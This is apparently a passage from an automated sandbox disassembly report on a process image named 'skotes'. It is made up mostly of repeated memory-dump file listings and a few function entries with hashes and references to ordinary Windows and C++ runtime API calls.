                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                                                                            • String ID: Zc,mc
                                                                                                                                                                                            • API String ID: 809856575-1271613949
                                                                                                                                                                                            • Opcode ID: 5745a3e71f27b0db568f59b6af626d3a07803fca5ae2dbfec918cfb88553c52d
                                                                                                                                                                                            • Instruction ID: 8f878bd02a1c7e9ddc7ed8827aabe39c64a4fd8600a5f7f0eb10f5f4d0f48e3b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5745a3e71f27b0db568f59b6af626d3a07803fca5ae2dbfec918cfb88553c52d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D318F71D0021AEBDB219FA5CC41EEF7BAAEF45310F054128F914A7251DB348A51C7E4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00631764
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006317AF
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pContext
                                                                                                                                                                                            • API String ID: 3390424672-2046700901
                                                                                                                                                                                            • Opcode ID: 2b52c1e1f9be81e6807d9454ca75ca574d82f436ae3afcaace27eb380e1ac57c
                                                                                                                                                                                            • Instruction ID: d5117978b084190cfd74d9d2ad5ed08749cd18907ad9fda209fab9a61609a228
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b52c1e1f9be81e6807d9454ca75ca574d82f436ae3afcaace27eb380e1ac57c
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2110635A002149BCF55EF18C8855AD77B7AF86361F098069EC029F342DB34DD05CBD0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00620CD7
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00620D2A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                                                                            • String ID: p[f
                                                                                                                                                                                            • API String ID: 3303180142-1445917104
                                                                                                                                                                                            • Opcode ID: 9291cd759091d82712fd325a3bbe747d1d471f15a827089157b07f433e582ef8
                                                                                                                                                                                            • Instruction ID: f1680bf40688633cf9a106ceb1e9012d7b1eec71b112d69fecbf4b0a50c49255
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9291cd759091d82712fd325a3bbe747d1d471f15a827089157b07f433e582ef8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3801B570A05A259EEB50ABF8766239D66E36F08310F64045EE405EB383CE708E418F5A
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateSemaphoreExW.KERNEL32(?,006265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0061CAFC
                                                                                                                                                                                            • CreateSemaphoreW.KERNEL32(?,006265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0061CB1E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
